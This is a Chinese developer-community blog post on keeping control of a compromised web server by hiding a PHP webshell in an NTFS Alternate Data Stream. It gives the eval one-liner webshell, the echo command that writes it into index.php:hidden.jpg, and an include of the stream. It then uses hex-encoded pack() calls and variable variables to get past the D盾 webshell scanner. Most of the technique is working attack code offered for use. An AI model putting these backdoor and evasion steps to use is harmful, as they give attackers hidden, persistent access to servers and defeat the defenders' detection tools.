开发者社区> bypass> 正文

【web端权限维持】利用ADS隐藏webshell

简介: 0X01 前言   未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。 0X02 利用ADS隐藏webshell   关于ADS的介绍,就不再阐述,详见尾部参考资料。
+关注继续查看

0X01 前言

  未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。

0X02 利用ADS隐藏webshell

  关于ADS的介绍,就不再阐述,详见尾部参考资料。

  PHP 一句话木马:<?php @eval($_POST['chopper']);?>,当然也可以直接制作免杀PHP一句话,毕竟PHP千变万化,从变量,数组,赋值,运算,函数等,各种变种。。。

       制作步骤一:创建ADS隐藏文件

       在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:  

echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

  这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。   

       问题1:如何查看index.php:hidden.jpg内容呢?

  进入文件所在目录,notepad index.php:hidden.jpg    或者 dir /r

  问题2:如何删除index.php:hidden.jpg?

       直接删除index.php即可

       制作步骤二:文件包含

  一个正常文件里把这个ADS文件include进去,<?php include(‘index.php:hidden.jpg’)?>,这样子就可以正常解析我们的一句话了。

  但是却非常容易被webshell查杀工具查到,看到可疑引用的文件名,分分钟出局了。

  

 

  制作步骤三:如何绕过检测

  这边要解决的是include函数,如何让它检测不出来有可疑引用文件呢?

  在某次应急响应事件中,获取到一段代码,这里拿来改造一下。代码如下:

<?php
@include(PACK('H*','xx'));
?>

  PHP pack() 函数 函数介绍:http://www.w3school.com.cn/php/func_misc_pack.asp

  将index.php:hidden.jpg进行hex编码

<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

  再次用D盾_web查杀进行扫描,还是被查到了。

  

  进一步利用PHP 可变变量进行二次转换,最后得到绕过D盾扫描的姿势如下:

<?php 
$a="696E6465782E7068703"."A68696464656E2E6A7067";
$b="a";
include(PACK('H*',$$b))
?>

绕过D盾_web查杀如图:

0X03 最后

  权限维持,也是一门很重要的课题,熟悉各种常见的后门技术,并懂得如何进行安全防御。

 

参考文章:

NTFS中的ADS的一些问题  https://www.i0day.com/733.html

一个用ADS(供选数据流)隐藏Windows后门的方法  http://www.freebuf.com/articles/73270.html

Windows中隐藏文件的捷径---------NTFS文件流(ADS)  http://blog.csdn.net/c395565746c/article/details/5336260

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
阿里云ECS云服务器初始化设置教程方法
阿里云ECS云服务器初始化是指将云服务器系统恢复到最初状态的过程,阿里云的服务器初始化是通过更换系统盘来实现的,是免费的,阿里云百科网分享服务器初始化教程: 服务器初始化教程方法 本文的服务器初始化是指将ECS云服务器系统恢复到最初状态,服务器中的数据也会被清空,所以初始化之前一定要先备份好。
14282 0
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,阿里云优惠总结大概有三种登录方式: 登录到ECS云服务器控制台 在ECS云服务器控制台用户可以更改密码、更换系.
29203 0
oracle低权限下获取shell
转载请标明:http://hi.baidu.com/hack_forensic 《关于oracle列目录的可行性测试》 经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj021320在文章最后说,当然这个方法缺点就是你要知道WEB路径.
495 0
阿里云服务器端口号设置
阿里云服务器初级使用者可能面临的问题之一. 使用tomcat或者其他服务器软件设置端口号后,比如 一些不是默认的, mysql的 3306, mssql的1433,有时候打不开网页, 原因是没有在ecs安全组去设置这个端口号. 解决: 点击ecs下网络和安全下的安全组 在弹出的安全组中,如果没有就新建安全组,然后点击配置规则 最后如上图点击添加...或快速创建.   have fun!  将编程看作是一门艺术,而不单单是个技术。
20714 0
ASP.NET MVC+EF框架+EasyUI实现权限管理系列(19)-用户信息的修改和浏览
原文:ASP.NET MVC+EF框架+EasyUI实现权限管理系列(19)-用户信息的修改和浏览    ASP.NET MVC+EF框架+EasyUI实现权限管系列   (开篇)   (1):框架搭建    (2):数据库访问层的设计Demo    (3):面向接口编程   (4 ):业务逻辑层...
981 0
+关注
bypass
一个网络安全爱好者
111
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
JS零基础入门教程(上册)
立即下载
性能优化方法论
立即下载
手把手学习日志服务SLS,云启实验室实战指南
立即下载